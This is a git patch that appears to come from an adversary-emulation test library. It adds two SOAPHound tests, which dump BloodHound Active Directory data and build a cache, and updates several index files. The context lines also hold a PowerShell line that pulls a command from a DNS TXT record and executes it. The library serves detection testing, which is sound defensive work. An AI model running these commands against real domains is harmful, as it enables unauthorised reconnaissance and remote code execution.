execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 68094d9cb0..9d30266e31 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -635,6 +635,8 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,SOAPHound - Dump BloodHound Data,6a5b2a50-d037-4879-bf01-43d4d6cbf73f,powershell +execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,SOAPHound - Build Cache,4099086c-1470-4223-8085-8186e1ed5948,powershell execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 86862318cf..ea1b990398 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1256,6 +1256,8 @@ - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] - Atomic Test #19: PowerUp Invoke-AllChecks [windows] - Atomic Test #20: Abuse Nslookup with DNS Records [windows] + - Atomic Test #21: SOAPHound - Dump BloodHound Data [windows] + - Atomic Test #22: SOAPHound - Build Cache [windows] - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - Atomic Test #2: Create a user level transient systemd service and timer [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index c95b224d4a..8b14186cf9 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -874,6 +874,8 @@ - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] - Atomic Test #19: PowerUp Invoke-AllChecks [windows] - Atomic Test #20: Abuse Nslookup with DNS Records [windows] + - Atomic Test #21: SOAPHound - Dump BloodHound Data [windows] + - Atomic Test #22: SOAPHound - Build Cache [windows] - [T1559 Inter-Process Communication](../../T1559/T1559.md) - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows] - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 29c7a31ce4..af1bd369c2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -51153,6 +51153,83 @@ execution: function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell + - name: SOAPHound - Dump BloodHound Data + auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f + description: | + Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + outputdirectory: + description: Output directory + type: string + default: c:\temp\test2 + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user #{user} --password #{password} --domain + #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory + #{outputdirectory}\n" + name: powershell + - name: SOAPHound - Build Cache + auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948 + description: | + Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} + --dc #{dc} --buildcache --cachefilename #{cachefilename}\n" + name: powershell T1053.006: technique: modified: '2023-09-08T11:56:26.862Z' diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 28a032034a..f2b3f060a2 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -42308,6 +42308,83 @@ execution: function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell + - name: SOAPHound - Dump BloodHound Data + auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f + description: | + Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + outputdirectory: + description: Output directory + type: string + default: c:\temp\test2 + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user #{user} --password #{password} --domain + #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory + #{outputdirectory}\n" + name: powershell + - name: SOAPHound - Build Cache + auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948 + description: | + Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: "$env:USERNAME" + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: "$env:USERDOMAIN" + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: "#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} + --dc #{dc} --buildcache --cachefilename #{cachefilename}\n" + name: powershell T1053.006: technique: modified: '2023-09-08T11:56:26.862Z' diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index dc18799341..4c4a24e12b 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -50,6 +50,10 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #20 - Abuse Nslookup with DNS Records](#atomic-test-20---abuse-nslookup-with-dns-records) +- [Atomic Test #21 - SOAPHound - Dump BloodHound Data](#atomic-test-21---soaphound---dump-bloodhound-data) + +- [Atomic Test #22 - SOAPHound - Build Cache](#atomic-test-22---soaphound---build-cache) +
@@ -828,4 +832,83 @@ powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] +
+
+ +## Atomic Test #21 - SOAPHound - Dump BloodHound Data +Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. +src: https://github.com/FalconForceTeam/SOAPHound + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 6a5b2a50-d037-4879-bf01-43d4d6cbf73f + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user | Username for authentication | string | $env:USERNAME| +| password | Password for authentication | string | P@ssword1| +| domain | Domain for authentication | string | $env:USERDOMAIN| +| dc | Domain Controller IP | string | 10.0.1.14| +| cachefilename | Cache filename | string | c:\temp\cache.txt| +| outputdirectory | Output directory | string | c:\temp\test2| +| soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory} +``` + + + + + + +
+
+ +## Atomic Test #22 - SOAPHound - Build Cache +Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. +src: https://github.com/FalconForceTeam/SOAPHound + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 4099086c-1470-4223-8085-8186e1ed5948 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user | Username for authentication | string | $env:USERNAME| +| password | Password for authentication | string | P@ssword1| +| domain | Domain for authentication | string | $env:USERDOMAIN| +| dc | Domain Controller IP | string | 10.0.1.14| +| cachefilename | Cache filename | string | c:\temp\cache.txt| +| soaphound_path | Path to SOAPHound binary | string | PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename} +``` + + + + + +
From e1d81a1412b27a19970f45419c7892181f8ecaae Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 22 Feb 2024 12:43:27 -0500 Subject: [PATCH 06/41] remove open source index badge (#2692) --- README.md | 18 ++---------------- 1 file changed, 2 insertions(+), 16 deletions(-) diff --git a/README.md b/README.md index 45e783c468..1569ca6fee 100644 --- a/README.md +++ b/README.md @@ -1,22 +1,8 @@ -